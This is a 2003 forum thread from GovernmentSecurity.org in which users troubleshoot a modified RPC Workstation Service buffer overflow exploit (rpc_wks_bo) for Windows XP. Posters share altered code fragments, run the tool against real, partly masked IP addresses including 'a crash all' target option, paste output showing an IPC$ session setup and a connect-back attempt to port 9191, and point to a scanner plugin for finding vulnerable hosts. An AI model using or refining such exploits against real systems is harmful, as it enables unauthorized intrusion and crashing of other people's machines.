Rpc_wks_bo.exe

GovernmentSecurity.org > The Archives > Public Downloads

101

Dec 6 2003, 10:21 AM

looks like 2 parts have been changed in the code here:

near that

CODE

void send_exp();
// ----------Lamers buff =) ----------------------------
char expl[3000];
wchar_t expl_uni[6000];
char tgt_net[30];
wchar_t tgt_net_uni[60];
char ipc[30];
// -----------------------------------------------------

& here

CODE

NetAddAlternateComputerName(tgt_net_uni, expl_uni ,NULL,NULL,0);
// ka-a-a b0-0-0-ms //

I modified the code but the exploit still look like only working locally.
This is prolly thos Lamers Buff to change or FiNiS is joking on your face.

l8r

DJVASTVASTY2K

Dec 6 2003, 01:02 PM

ok lemme see

thanks bro

will hit ya up wid some results

code still looks odd

Best Regards

Adam

Vast Gsm

DJVASTVASTY2K

Dec 6 2003, 01:10 PM

Ok

Here Is Results So Far

rpc_wks_bo_101 -h 141.xxx.xx.xx -t0

Possible targets are:
============================
1) Window XP + SP0 [Rus]
2) Window XP + SP0 + Rollup [Rus]
3) Window XP + SP1 [Rus]
4) Window XP + SP1 + Rollup [Rus]
5) Crash all

rpc_wks_bo_101 -h 141.xxx.xx.xx -t 5

[+] Prepare exploit string
[+] Sleep at 2s ...
[+] Setting up IPC$ session...
[*] IPC$ session setup successfully!
[+] Sending exploit ...
[+] Initialize WSAStartup - OK
[*] Socket initialized - OK
[+] Try connecting to 141.xxx.xx.xx:9191 ...

Is It Suppose To Say Target Crash Success or ??

Seems To Be Is Just Idleing, Maybe Code Not Work Have Tried On 2 Other Targets And Same Will Keep Trying And Hit Ya Up Wid Some Results

Best Regards

Adam

Vast Gsm

passi

Dec 6 2003, 02:19 PM

hm, does anyone know how to scan for this?

101

Dec 6 2003, 05:20 PM

QUOTE (DJVASTVASTY2K @ Dec 6 2003, 01:10 PM)

[+] Prepare exploit string
[+] Sleep at 2s ...
[+] Setting up IPC$ session...
[*] IPC$ session setup successfully!
[+] Sending exploit ...
[+] Initialize WSAStartup - OK
[*] Socket initialized - OK
[+] Try connecting to 141.xxx.xx.xx:9191 ...

Is It Suppose To Say Target Crash Success or ??

Seems To Be Is Just Idleing, Maybe Code Not Work Have Tried On 2 Other Targets And Same Will Keep Trying And Hit Ya Up Wid Some Results

Best Regards

Adam

Vast Gsm

Maybe are you running this exp from a NON-XP Os.
Cos i modified it to call the value NetAddAlternateComputerName in the netapi32.dll , prolly only present on XP os.

nb: sorry the really crap eng i have :/

l8r.

PSR

Dec 6 2003, 06:24 PM

QUOTE (passiw @ Dec 6 2003, 02:19 PM)

hm, does anyone know how to scan for this?

use the damsn search function . sorry but it's like the 3rd time i am saying this. xscan plug-in , forgot who made it but it is a good job and the plug in is working very well . not made especially for this exploit but ms0349 in general.

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.